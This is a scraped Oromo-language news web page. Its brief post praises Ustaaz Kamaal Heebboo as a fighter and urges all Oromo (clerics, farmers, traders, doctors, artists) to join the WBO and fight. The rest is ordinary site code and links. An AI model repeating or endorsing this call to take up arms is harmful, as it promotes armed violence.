<div dir="auto"><strong>Akkanatti dirree gootaati bookkisaa jira.</strong></div>
<div dir="auto"> </div>
<div dir="auto">Oromoo kamaal heebboo fkn godhadhu.</div>
<div dir="auto">Maalteettee teettaa miti sheekkonni haftanis,</div>
<div dir="auto">Qeeysonnifi paastariidhanillee,qotee bulaafi daldaltoonnillee akkasuma doktorootaafi arsiisonnillee akka leencicha kamaal heebbootti wbo tti dabalami loli.</div>
<div dir="auto">Teetteetumaan suura gootota du&#8217;anii hinmaxxansiniiti.</div>
</div>
<div class="o9v6fnle cxmmr5t8 oygrvhab hcukyx3x c1et5uql ii04i59q">
<div dir="auto">Hamilee yoo qabaattan geerarsa har&#8217;a kamal heebboo ittiin numaraachaa oole isiniif maxxansa.</div>
<div dir="auto">Geerarsi akkanaa kanaan dura weellisaa kamiinuu geeraramee hinbeeku.</div>
<div dir="auto">Jaala kanaan umrii dheerdhu naa jedhaanii.</div>
<div dir="auto">
<h5 class="gmql0nx0 l94mrbxd p1ri9a11 lzcic4wl aahdfvyu hzawbc8m" dir="auto"><span class="nc684nl6"><a class="oajrlxb2 g5ia77u1 qu0x051f esr5mh6w e9989ue4 r7d6kgcz rq0escxv nhd2j8a9 nc684nl6 p7hjln8o kvgmc6g5 cxmmr5t8 oygrvhab hcukyx3x jb3vyjys rz4wbd8a qt6c0cv9 a8nywdso i1ao9s8h esuyzwwr f1sip0of lzcic4wl oo9gr5id gpro0wi8 lrazzd5p" tabindex="0" role="link" href="https://www.facebook.com/profile.php?id=100069206016081&amp;__cft__[0]=AZWPwqIlPF215DwN6wFkxhQRZWfLlT2XWAG1ue8WduCQBOUXtiNy6IJo3CfnHZHgIQ84uaDV4-kRhfZjAomA9d8lYoBxckp6g4RTqKHWpvUn5wtNZXg6esDxQGGHF27N7GKA909Zj5vKbSfwwNPV28Cb4SPGYjSOaFPEtslDDyeO1vag8_xqhdH_w02IPHwvE68&amp;__tn__=-UC%2CP-y-R"><strong>Jaal Cichaa Kaayoo</strong></a></span></h5>
<p><img class="alignnone size-full wp-image-96650" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20700%20525'%3E%3C/svg%3E" alt="" width="700" height="525" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap16-1-e1625008937608.jpg" /><noscript><img class="alignnone size-full wp-image-96650" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap16-1-e1625008937608.jpg" alt="" width="700" height="525" /></noscript></p>
<h5 class="gmql0nx0 l94mrbxd p1ri9a11 lzcic4wl aahdfvyu hzawbc8m" dir="auto"><span class="nc684nl6"><a class="oajrlxb2 g5ia77u1 qu0x051f esr5mh6w e9989ue4 r7d6kgcz rq0escxv nhd2j8a9 nc684nl6 p7hjln8o kvgmc6g5 cxmmr5t8 oygrvhab hcukyx3x jb3vyjys rz4wbd8a qt6c0cv9 a8nywdso i1ao9s8h esuyzwwr f1sip0of lzcic4wl oo9gr5id gpro0wi8 lrazzd5p" tabindex="0" role="link" href="https://www.facebook.com/profile.php?id=100069206016081&amp;__cft__[0]=AZWPwqIlPF215DwN6wFkxhQRZWfLlT2XWAG1ue8WduCQBOUXtiNy6IJo3CfnHZHgIQ84uaDV4-kRhfZjAomA9d8lYoBxckp6g4RTqKHWpvUn5wtNZXg6esDxQGGHF27N7GKA909Zj5vKbSfwwNPV28Cb4SPGYjSOaFPEtslDDyeO1vag8_xqhdH_w02IPHwvE68&amp;__tn__=-UC%2CP-y-R"><strong>Jaal Cichaa Kaayoo</strong></a></span></h5>
</div>
</div>
<div class="mh-social-bottom">
<div class="mh-share-buttons clearfix">
	<a class="mh-facebook" href="#" onclick="window.open('https://www.facebook.com/sharer.php?u=https%3A%2F%2Fkichuu.com%2Fustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira%2F&t=USTAAZ+KAMAAL+HEEBBOO%3A+Akkanatti+dirree+gootaati+bookkisaa+jira.', 'facebookShare', 'width=626,height=436'); return false;" title="Share on Facebook">
		<span class="mh-share-button"><i class="fa fa-facebook"></i></span>
	</a>
	<a class="mh-twitter" href="#" onclick="window.open('https://twitter.com/share?text=USTAAZ+KAMAAL+HEEBBOO%3A+Akkanatti+dirree+gootaati+bookkisaa+jira.:&url=https%3A%2F%2Fkichuu.com%2Fustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira%2F', 'twitterShare', 'width=626,height=436'); return false;" title="Tweet This Post">
		<span class="mh-share-button"><i class="fa fa-twitter"></i></span>
	</a>
	<a class="mh-linkedin" href="#" onclick="window.open('https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fkichuu.com%2Fustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira%2F&source=', 'linkedinShare', 'width=626,height=436'); return false;" title="Share on LinkedIn">
		<span class="mh-share-button"><i class="fa fa-linkedin"></i></span>
	</a>
	<a class="mh-pinterest" href="#" onclick="window.open('https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fkichuu.com%2Fustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira%2F&media=https://kichuu.com/wp-content/uploads/2021/06/pizap16-1-e1625008937608.jpg&description=USTAAZ+KAMAAL+HEEBBOO%3A+Akkanatti+dirree+gootaati+bookkisaa+jira.', 'pinterestShare', 'width=750,height=350'); return false;" title="Pin This Post">
		<span class="mh-share-button"><i class="fa fa-pinterest"></i></span>
	</a>
	<a class="mh-email" href="mailto:?subject=USTAAZ%20KAMAAL%20HEEBBOO%3A%20Akkanatti%20dirree%20gootaati%20bookkisaa%20jira.&amp;body=https%3A%2F%2Fkichuu.com%2Fustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira%2F" title="Send this article to a friend" target="_blank">
		<span class="mh-share-button"><i class="fa fa-envelope-o"></i></span>
	</a>
	<a class="mh-print" href="javascript:window.print()" title="Print this article">
		<span class="mh-share-button"><i class="fa fa-print"></i></span>
	</a>
</div></div>
	</div><div id="custom_html-16" class="widget_text mh-widget mh-posts-2 widget_custom_html"><div class="textwidget custom-html-widget"><script data-rocketlazyloadscript='https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js' async ></script>
<!-- kichuu20210131-3h -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-6953193962442323"
     data-ad-slot="4120112176"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></article><nav class="mh-post-nav mh-row clearfix" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
<div class="mh-col-1-2 mh-post-nav-item mh-post-nav-prev">
<a href="https://kichuu.com/dirre-dhawaa-biyya-yeroo-rakkoo-goota-oomishtee-oromoof-gad-kennaa-turte/" rel="prev"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Dirre Dhawaa" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Dirre Dhawaa" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript><span>Previous</span><p>Dirre Dhawaa biyya yeroo rakkoo goota Oomishtee Oromoof gad kennaa turte</p></a></div>
<div class="mh-col-1-2 mh-post-nav-item mh-post-nav-next">
<a href="https://kichuu.com/yaaddannoo-hacaaluu-amboo-tahe-fi-oddeefannoo-lola-tigraayin-miidhaa-pp-mudate/" rel="next"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Hacaaluu" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-e1625009971357.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Hacaaluu" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-e1625009971357.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript><span>Next</span><p>Yaaddannoo Hacaaluu Amboo tahe fi Oddeefannoo Lola Tigraayin miidhaa PP mudate</p></a></div>
</nav>
<div id="comments" class="mh-comments-wrap">
			<h4 class="mh-widget-title mh-comment-form-title">
				<span class="mh-widget-title-inner">
					Be the first to comment				</span>
			</h4>	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/ustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira/#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://kichuu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes">Your email address will not be published.</p><p class="comment-form-comment"><label for="comment">Comment</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /><label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='96649' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="9563c4c128" /></p><input type="hidden" id="ak_js" name="ak_js" value="149"/><textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100" style="display: none !important;"></textarea></form>	</div><!-- #respond -->
	<p class="akismet_comment_form_privacy_notice">This site uses Akismet to reduce spam. <a href="https://akismet.com/privacy/" target="_blank" rel="nofollow noopener">Learn how your comment data is processed</a>.</p></div>
		</div>
			<aside class="mh-widget-col-1 mh-sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar"><div id="custom_html-17" class="widget_text mh-widget widget_custom_html"><div class="textwidget custom-html-widget"><script data-rocketlazyloadscript='https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js' async ></script>
<!-- kichuu20210131-1v -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-6953193962442323"
     data-ad-slot="3980511370"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div><div id="mh_magazine_custom_posts-26" class="mh-widget mh_magazine_custom_posts"><h4 class="mh-widget-title"><span class="mh-widget-title-inner">Recent Posts</span></h4>			<ul class="mh-custom-posts-widget clearfix"> 						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96676 post type-post status-publish format-standard has-post-thumbnail category-news-afaan-oromoo">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/jaakoob-zuumaa-peresedaantiin-afrikaa-kibbaa-duranii-akka-hidhaman-murteen-darbe/" title="Jaakoob Zuumaa peresedaantiin Afrikaa Kibbaa duranii akka hidhaman murteen darbe"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Jaakoob Zuumaa" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208574555_626834334878751_5281855920653023718_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208574555_626834334878751_5281855920653023718_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208574555_626834334878751_5281855920653023718_n-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208574555_626834334878751_5281855920653023718_n-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208574555_626834334878751_5281855920653023718_n-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Jaakoob Zuumaa" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208574555_626834334878751_5281855920653023718_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208574555_626834334878751_5281855920653023718_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208574555_626834334878751_5281855920653023718_n-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/jaakoob-zuumaa-peresedaantiin-afrikaa-kibbaa-duranii-akka-hidhaman-murteen-darbe/" title="Jaakoob Zuumaa peresedaantiin Afrikaa Kibbaa duranii akka hidhaman murteen darbe">
										Jaakoob Zuumaa peresedaantiin Afrikaa Kibbaa duranii akka hidhaman murteen darbe									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96665 post type-post status-publish format-standard has-post-thumbnail category-africa">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/an-uneasy-silence-from-ethiopia-and-eritrea-over-whats-next/" title="An uneasy silence from Ethiopia and Eritrea over what’s next."><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia -Eritrea" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-60-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-60-326x245.png 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-60-80x60.png" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-60-80x60.png" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia -Eritrea" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-60-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-60-326x245.png 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/an-uneasy-silence-from-ethiopia-and-eritrea-over-whats-next/" title="An uneasy silence from Ethiopia and Eritrea over what’s next.">
										An uneasy silence from Ethiopia and Eritrea over what’s next.									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96659 post type-post status-publish format-standard has-post-thumbnail category-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/oromiyaa-sagantaa-yaadannoo-hacaaluu-hundeessaatii-ambootti/" title="Oromiyaa: Sagantaa yaadannoo Hacaaluu Hundeessaatii Ambootti!"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Hacaaluu" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208900551_4037159869671765_2022427824093640370_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208900551_4037159869671765_2022427824093640370_n-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208900551_4037159869671765_2022427824093640370_n-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208900551_4037159869671765_2022427824093640370_n.jpg 540w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208900551_4037159869671765_2022427824093640370_n-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208900551_4037159869671765_2022427824093640370_n-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Hacaaluu" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208900551_4037159869671765_2022427824093640370_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208900551_4037159869671765_2022427824093640370_n-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208900551_4037159869671765_2022427824093640370_n-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/208900551_4037159869671765_2022427824093640370_n.jpg 540w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/oromiyaa-sagantaa-yaadannoo-hacaaluu-hundeessaatii-ambootti/" title="Oromiyaa: Sagantaa yaadannoo Hacaaluu Hundeessaatii Ambootti!">
										Oromiyaa: Sagantaa yaadannoo Hacaaluu Hundeessaatii Ambootti!									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96656 post type-post status-publish format-standard has-post-thumbnail category-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/lawmaker-praises-ceasefire-in-ethiopia-but-raises-concerns-about-possible-genocide-in-tigray-region/" title="Lawmaker Praises Ceasefire In Ethiopia But Raises Concerns About Possible Genocide In Tigray Region"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Genocide" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-e1625011610302.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Genocide" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-e1625011610302.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap18-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/lawmaker-praises-ceasefire-in-ethiopia-but-raises-concerns-about-possible-genocide-in-tigray-region/" title="Lawmaker Praises Ceasefire In Ethiopia But Raises Concerns About Possible Genocide In Tigray Region">
										Lawmaker Praises Ceasefire In Ethiopia But Raises Concerns About Possible Genocide In Tigray Region									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96653 post type-post status-publish format-standard has-post-thumbnail category-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/yaaddannoo-hacaaluu-amboo-tahe-fi-oddeefannoo-lola-tigraayin-miidhaa-pp-mudate/" title="Yaaddannoo Hacaaluu Amboo tahe fi Oddeefannoo Lola Tigraayin miidhaa PP mudate"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Hacaaluu" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-e1625009971357.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Hacaaluu" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-e1625009971357.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap17-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/yaaddannoo-hacaaluu-amboo-tahe-fi-oddeefannoo-lola-tigraayin-miidhaa-pp-mudate/" title="Yaaddannoo Hacaaluu Amboo tahe fi Oddeefannoo Lola Tigraayin miidhaa PP mudate">
										Yaaddannoo Hacaaluu Amboo tahe fi Oddeefannoo Lola Tigraayin miidhaa PP mudate									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96646 post type-post status-publish format-standard has-post-thumbnail category-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/dirre-dhawaa-biyya-yeroo-rakkoo-goota-oomishtee-oromoof-gad-kennaa-turte/" title="Dirre Dhawaa biyya yeroo rakkoo goota Oomishtee Oromoof gad kennaa turte"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Dirre Dhawaa" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Dirre Dhawaa" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/206379341_2917713121809008_1104237521615541050_n-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/dirre-dhawaa-biyya-yeroo-rakkoo-goota-oomishtee-oromoof-gad-kennaa-turte/" title="Dirre Dhawaa biyya yeroo rakkoo goota Oomishtee Oromoof gad kennaa turte">
										Dirre Dhawaa biyya yeroo rakkoo goota Oomishtee Oromoof gad kennaa turte									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96643 post type-post status-publish format-standard has-post-thumbnail category-world">
															<figure class="mh-custom-posts-thumb">
